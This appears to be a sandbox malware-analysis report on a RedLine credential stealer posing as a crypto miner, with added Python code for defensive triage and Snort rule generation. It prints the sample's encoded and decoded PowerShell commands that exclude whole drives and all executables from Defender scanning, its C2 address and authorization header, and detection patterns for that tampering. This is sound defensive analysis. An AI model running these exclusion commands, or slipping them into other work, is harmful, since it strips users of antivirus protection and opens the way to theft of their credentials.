Windows Analysis Report: CryptoMiner.exe
Overview
General Information
Detection
RedLine
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Yara detected RedLine Stealer
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Is looking for software installed on the system
PE file does not import any functions
Sample file name differs from the original file name recorded in the version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Classification
Process Tree
- System is w10x64
- CryptoMiner.exe (PID: 6428, cmdline: "C:\Users\user\Desktop\CryptoMiner.exe", MD5: 310EB5BD45AC9C5767D28E63AB64635B)
- InstallUtil.exe (PID: 2140, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, MD5: EFEC8C379D165E3F33B536739AEE26A3)
- fname.exe (PID: 6720, cmdline: "C:\Users\user\AppData\Local\Temp\fname.exe", MD5: C61F9A9059F8B8BD0E69F7DF4CB09786)
- conhost.exe (PID: 6712, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- AppLaunch.exe (PID: 5972, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, MD5: 6807F903AC06FF7E1670181378690B22)
- filename.exe (PID: 4584, cmdline: "C:\Users\user\AppData\Local\Temp\filename.exe", MD5: C108EBDD14A2CF40E64411792987796A)
- cmd.exe (PID: 6560, cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  The two -EncodedCommand arguments are base64 over UTF-16LE and decode to:
  Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
  Add-MpPreference -ExclusionExtension @('exe','dll') -Force
  i.e. the user profile, the whole system drive and every .exe/.dll file are excluded from Microsoft Defender scanning before the payload is dropped.
- conhost.exe (PID: 5336, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 4036, cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", MD5: 95000560239032BC68B4C2FDFCDEF913)
  Decodes to the same Add-MpPreference -ExclusionPath command as above.

InstallUtil.exe and AppLaunch.exe are .NET Framework utilities that are started here with no arguments at all, which matches the "Creates a process in suspended mode" and "Injects a PE file into a foreign process" signatures above: RedLine typically hollows one of these signed Microsoft binaries and runs the stealer from inside it.
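The process tree above carries two triage signals a detection engineer would want to automate: the base64/UTF-16LE -EncodedCommand arguments (which hide Defender exclusion tampering) and the argument-less launch of .NET helper binaries (the process-hollowing host). The following is an added example, not Joe Sandbox's code: it replays the command lines from this report (with the extraction spaces removed) through both checks. The list of hollowing hosts goes beyond the page by also including RegAsm.exe and RegSvcs.exe, which RedLine uses the same way; the finding labels and the `PROCESSES` tuple layout are this example's own.

```python
"""Triage helper for a sandbox process tree (added example, not Joe Sandbox code).

1. Decodes PowerShell -EncodedCommand payloads (base64 over UTF-16LE) and
   flags Microsoft Defender exclusion tampering (Add-/Set-MpPreference).
2. Flags a .NET helper binary started with no arguments, the shape used for
   process hollowing (InstallUtil.exe / AppLaunch.exe in this report; RegAsm
   and RegSvcs added as the same class of host).
"""
import base64
import re
from typing import List, Tuple

# The two encoded commands exactly as they appear in the report's process tree.
ENC_PATH = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
    "UABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4A"
    "dgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
)
ENC_EXT = (
    "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4A"
    "RQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYA"
    "bwByAGMAZQA="
)

# (image, pid, cmdline) copied from the report. Parent/child links are not
# shown on the page, so the list is flat.
PROCESSES: List[Tuple[str, int, str]] = [
    ("CryptoMiner.exe", 6428, r'"C:\Users\user\Desktop\CryptoMiner.exe"'),
    ("InstallUtil.exe", 2140, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"),
    ("fname.exe", 6720, r'"C:\Users\user\AppData\Local\Temp\fname.exe"'),
    ("conhost.exe", 6712, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("AppLaunch.exe", 5972, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"),
    ("filename.exe", 4584, r'"C:\Users\user\AppData\Local\Temp\filename.exe"'),
    ("cmd.exe", 6560,
     f'"cmd" cmd /c powershell -EncodedCommand "{ENC_PATH}" & '
     f'powershell -EncodedCommand "{ENC_EXT}" & exit'),
    ("conhost.exe", 5336, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ("powershell.exe", 4036, f'powershell -EncodedCommand "{ENC_PATH}"'),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r'-e(?:c|nc(?:oded(?:command)?)?)?\s+"?([A-Za-z0-9+/=]{16,})"?', re.I)
DEFENDER_TAMPER = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion\w*|Disable\w*)", re.I)
HOLLOW_HOSTS = {"installutil.exe", "applaunch.exe", "regasm.exe", "regsvcs.exe"}
CMDLINE_HEAD = re.compile(r'^\s*(?:"([^"]+)"|(\S+))\s*(.*)$')


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE, not UTF-8."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def split_cmdline(cmdline: str) -> Tuple[str, str]:
    """Return (executable, remaining arguments), honouring a quoted image path."""
    m = CMDLINE_HEAD.match(cmdline)
    return (m.group(1) or m.group(2)), m.group(3).strip()


def triage(processes: List[Tuple[str, int, str]]) -> List[dict]:
    findings = []
    for image, pid, cmdline in processes:
        exe, args = split_cmdline(cmdline)
        if exe.rsplit("\\", 1)[-1].lower() in HOLLOW_HOSTS and not args:
            findings.append({"pid": pid, "image": image,
                             "kind": "argless-dotnet-host", "detail": exe})
        for blob in ENCODED_ARG.findall(cmdline):
            try:
                script = decode_encoded_command(blob)
            except (ValueError, UnicodeDecodeError):
                continue  # not a real encoded command; leave it to other rules
            kind = "defender-exclusion" if DEFENDER_TAMPER.search(script) else "encoded-powershell"
            findings.append({"pid": pid, "image": image, "kind": kind, "detail": script})
    return findings


if __name__ == "__main__":
    for f in triage(PROCESSES):
        print(f"[{f['kind']}] {f['image']} (PID {f['pid']}): {f['detail']}")
```

Run against the report's process list this yields two argument-less host findings (PIDs 2140 and 5972) and three Defender-exclusion findings (two from cmd.exe 6560, one from powershell.exe 4036). A legitimate InstallUtil.exe or AppLaunch.exe invocation always carries arguments, so the empty-argument rule is cheap and has a low false-positive rate on endpoint telemetry.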
Malware configuration (extracted):
{"C2 url": ["65.21.213.209:32936"], "Bot Id": "", "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42"}
Yara rule matches

Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 of 7 entries)

Rule | Description | Author
---|---|---
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(5 of 11 entries)
No Sigma rule matched.
Snort IDS alerts (21, listed chronologically; all between local port 49796 and remote port 32936, the port of the C2 in the extracted configuration)

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
---|---|---|---|---|---
05/05/22-03:30:32.990118 | 2850027 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:34.048200 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:34.088289 | 2850353 | 32936 | 49796 | TCP | A Network Trojan was detected
05/05/22-03:30:40.973991 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:46.265169 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:46.475836 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:51.349484 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:51.428831 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:51.508362 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:51.576541 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:51.712280 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:52.519175 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:52.800684 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:52.844061 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:52.885401 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:54.158486 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:54.711716 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:54.760590 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:54.966150 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:55.007583 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected
05/05/22-03:30:55.048172 | 2850286 | 49796 | 32936 | TCP | A Network Trojan was detected

Only one alert (SID 2850353) fires on the server-to-client direction; the other twenty are client-to-server on the same port pair within a 22-second window, which is the single C2 session of the stealer exfiltrating data.
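The extracted configuration and the Snort alert table are two views of the same C2 session, and the first thing to do with them in triage is to confirm that they agree and to turn the configuration into a network detection. The following is an added example, not Joe Sandbox's code: the alert tuples and the configuration dict are copied from this report, while the summary field names, the emitted rule text (standard Snort/Suricata syntax), its message, and the sid numbering starting at 9000001 are this example's own choices.

```python
"""Correlate sandbox Snort alerts with an extracted RedLine configuration
(added example, not Joe Sandbox code)."""
from collections import Counter
from datetime import datetime
from typing import Dict, List, Tuple

# Configuration as extracted by the sandbox (copied from the report).
C2_CONFIG = {
    "C2 url": ["65.21.213.209:32936"],
    "Bot Id": "",
    "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42",
}

# (timestamp, sid, src_port, dst_port) for the 21 alerts in the table above.
ALERTS: List[Tuple[str, int, int, int]] = [
    ("05/05/22-03:30:32.990118", 2850027, 49796, 32936),
    ("05/05/22-03:30:34.048200", 2850286, 49796, 32936),
    ("05/05/22-03:30:34.088289", 2850353, 32936, 49796),
    ("05/05/22-03:30:40.973991", 2850286, 49796, 32936),
    ("05/05/22-03:30:46.265169", 2850286, 49796, 32936),
    ("05/05/22-03:30:46.475836", 2850286, 49796, 32936),
    ("05/05/22-03:30:51.349484", 2850286, 49796, 32936),
    ("05/05/22-03:30:51.428831", 2850286, 49796, 32936),
    ("05/05/22-03:30:51.508362", 2850286, 49796, 32936),
    ("05/05/22-03:30:51.576541", 2850286, 49796, 32936),
    ("05/05/22-03:30:51.712280", 2850286, 49796, 32936),
    ("05/05/22-03:30:52.519175", 2850286, 49796, 32936),
    ("05/05/22-03:30:52.800684", 2850286, 49796, 32936),
    ("05/05/22-03:30:52.844061", 2850286, 49796, 32936),
    ("05/05/22-03:30:52.885401", 2850286, 49796, 32936),
    ("05/05/22-03:30:54.158486", 2850286, 49796, 32936),
    ("05/05/22-03:30:54.711716", 2850286, 49796, 32936),
    ("05/05/22-03:30:54.760590", 2850286, 49796, 32936),
    ("05/05/22-03:30:54.966150", 2850286, 49796, 32936),
    ("05/05/22-03:30:55.007583", 2850286, 49796, 32936),
    ("05/05/22-03:30:55.048172", 2850286, 49796, 32936),
]


def parse_snort_ts(ts: str) -> datetime:
    """Snort alert timestamps with year: MM/DD/YY-HH:MM:SS.ffffff."""
    return datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f")


def c2_endpoints(cfg: dict) -> List[Tuple[str, int]]:
    """Split each 'host:port' C2 entry; rpartition keeps IPv6-style hosts intact."""
    out = []
    for url in cfg.get("C2 url", []):
        host, _, port = url.rpartition(":")
        out.append((host, int(port)))
    return out


def summarize(alerts, cfg: dict) -> Dict[str, object]:
    """Per-SID counts, direction relative to the configured C2 port, and dwell time."""
    c2_ports = {port for _, port in c2_endpoints(cfg)}
    per_sid: Counter = Counter()
    to_c2 = from_c2 = unrelated = 0
    for _, sid, sport, dport in alerts:
        per_sid[sid] += 1
        if dport in c2_ports:
            to_c2 += 1
        elif sport in c2_ports:
            from_c2 += 1
        else:
            unrelated += 1  # an alert the config does not explain: look closer
    times = sorted(parse_snort_ts(ts) for ts, *_ in alerts)
    return {"per_sid": dict(per_sid), "to_c2": to_c2, "from_c2": from_c2,
            "unrelated": unrelated, "first": times[0], "last": times[-1],
            "span_s": (times[-1] - times[0]).total_seconds()}


def c2_rules(cfg: dict, base_sid: int = 9000001) -> List[str]:
    """Turn each configured C2 endpoint into a Snort/Suricata rule (sid numbering is ours)."""
    rules = []
    for i, (host, port) in enumerate(c2_endpoints(cfg)):
        rules.append(
            f'alert tcp $HOME_NET any -> {host} {port} '
            f'(msg:"RedLine Stealer C2 connection to {host}:{port}"; '
            f'flow:to_server,established; classtype:trojan-activity; '
            f'sid:{base_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    print(summarize(ALERTS, C2_CONFIG))
    print("\n".join(c2_rules(C2_CONFIG)))
```

For this report the summary shows 20 client-to-server alerts, one server-to-client alert and no alert outside the configured C2 port, spread over about 22 seconds; a non-zero `unrelated` count would mean the sandbox saw traffic the extracted configuration does not account for (a second C2, a download host, or a misparsed config) and deserves a manual look.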
AV Detection

The page lists detections from Avira URL Cloud (2), Avira (2), the Malware Configuration Extractor, ReversingLabs (3), Metadefender (2, with permalinks) and Joe Sandbox ML (3), plus supporting evidence from static PE information (2), one file-creation event and two binary strings. The individual verdicts and matched values were not captured in this extract.

Networking

The page lists three Snort IDS hits, one DNS query, three strings found in memory and four HTTP traffic detections. The individual values were not captured in this extract.